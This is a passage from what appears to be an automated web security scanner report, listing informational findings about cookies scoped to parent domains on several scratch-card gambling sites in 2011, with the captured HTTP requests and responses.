Set-Cookie: LanguageCode=FRE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.39. http://fr.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=25F075332F047D1B0CF607CCD7D249CD&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:11:03 GMT; path=/
UniqueVisitorID=25F075332F047D1B0CF607CCD7D249CD; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5huvzsa0en1qm555mqufug55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=25F075332F047D1B0CF607CCD7D249CD&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:11:03 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: UniqueVisitorID=25F075332F047D1B0CF607CCD7D249CD; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.40. http://fr.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_1=EncryptedUniqueVisitorID=0C638717D7C21970D51ED74830A7E2D9&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:30:40 GMT; path=/
UniqueVisitorID=0C638717D7C21970D51ED74830A7E2D9; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4pybr5mog1wyq1ypzxg2txmq; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=0C638717D7C21970D51ED74830A7E2D9&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:30:40 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: UniqueVisitorID=0C638717D7C21970D51ED74830A7E2D9; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.41. http://fr.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=5402E87C2984227C4B267200D292C2AC&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:13 GMT; path=/
UniqueVisitorID=5402E87C2984227C4B267200D292C2AC; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=33f2gh45mw2dub45vfy4im55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=5402E87C2984227C4B267200D292C2AC&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:13 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: UniqueVisitorID=5402E87C2984227C4B267200D292C2AC; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.42. http://home.okscratchcards.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.43. http://home.okscratchcards.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.44. http://home.okscratchcards.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.45. http://home.okscratchcards.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.46. http://home.okscratchcards.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Promotions.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=15538&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 12:14:38 GMT; path=/
UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Promotions.aspx?&mmi=15538 HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

11.47. http://home.okscratchcards.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.48. http://home.okscratchcards.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.49. http://home.okscratchcards.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.50. http://home.okscratchcards.com/help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
